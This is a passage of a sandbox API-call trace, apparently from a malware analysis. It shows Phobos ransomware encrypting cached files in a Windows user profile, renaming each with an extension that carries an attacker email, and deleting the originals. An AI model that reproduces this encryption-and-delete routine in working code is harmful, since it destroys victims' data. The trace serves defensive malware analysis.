pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0200.730] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.730] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0200.730] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.730] CloseHandle (hObject=0x13c) returned 1 [0200.730] CloseHandle (hObject=0x174) returned 1 [0200.730] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db")) returned 1 [0200.736] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0200.737] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=24) returned 1 [0200.737] CloseHandle (hObject=0x174) returned 1 [0200.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db")) returned 0x2020 [0200.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0200.737] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0200.737] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0200.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0200.738] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0200.738] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.738] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18, lpOverlapped=0x0) returned 1 [0200.739] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20, dwBufLen=0x20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20) returned 1 [0200.739] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x20, lpOverlapped=0x0) returned 1 [0200.740] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0200.740] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.740] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0200.740] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.740] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0200.740] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.740] CloseHandle (hObject=0x174) returned 1 [0200.740] CloseHandle (hObject=0x13c) returned 1 [0200.740] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db")) returned 1 [0200.742] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0200.743] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=24) returned 1 [0200.743] CloseHandle (hObject=0x13c) returned 1 [0200.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db")) returned 0x2020 [0200.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0200.743] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0200.743] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0200.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0200.744] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0200.744] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.744] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18, lpOverlapped=0x0) returned 1 [0200.744] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20, dwBufLen=0x20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20) returned 1 [0200.745] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x20, lpOverlapped=0x0) returned 1 [0200.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0200.745] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.745] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0200.745] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.745] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0200.746] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.746] CloseHandle (hObject=0x13c) returned 1 [0200.746] CloseHandle (hObject=0x174) returned 1 [0200.746] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db")) returned 1 [0200.747] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0200.747] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3256) returned 1 [0200.747] CloseHandle (hObject=0x174) returned 1 [0200.747] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db")) returned 0x2020 [0200.747] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0200.747] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0200.748] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0200.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0200.748] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0200.748] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.748] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcb8, lpOverlapped=0x0) returned 1 [0200.994] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xcc0, dwBufLen=0xcc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xcc0) returned 1 [0200.994] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xcc0, lpOverlapped=0x0) returned 1 [0200.995] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0200.995] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.995] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0200.995] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.995] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0200.995] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.995] CloseHandle (hObject=0x174) returned 1 [0200.996] CloseHandle (hObject=0x13c) returned 1 [0201.043] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db")) returned 1 [0201.044] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0201.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.045] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0201.045] CloseHandle (hObject=0x100) returned 1 [0201.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini")) returned 0x2026 [0201.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.045] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.045] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.046] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0201.046] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.046] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0201.047] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0201.047] WriteFile (in: hFile=0xfc, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0201.047] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328e8) returned 1 [0201.047] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.048] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0201.048] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.048] WriteFile (in: hFile=0xfc, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0201.048] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.048] CloseHandle (hObject=0x100) returned 1 [0201.048] CloseHandle (hObject=0xfc) returned 1 [0201.048] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini")) returned 1 [0201.049] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0201.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.049] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=32768) returned 1 [0201.049] CloseHandle (hObject=0xfc) returned 1 [0201.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")) returned 0x2026 [0201.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.050] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.050] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0201.050] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.050] ReadFile (in: hFile=0xfc, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8000, lpOverlapped=0x0) returned 1 [0201.124] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010, dwBufLen=0x8010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010) returned 1 [0201.125] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8010, lpOverlapped=0x0) returned 1 [0201.126] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32928) returned 1 [0201.126] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.126] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0201.126] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.126] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0201.126] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.126] CloseHandle (hObject=0xfc) returned 1 [0201.126] CloseHandle (hObject=0x100) returned 1 [0201.126] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")) returned 1 [0201.127] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0201.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.127] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0201.128] CloseHandle (hObject=0x100) returned 1 [0201.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini")) returned 0x2026 [0201.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 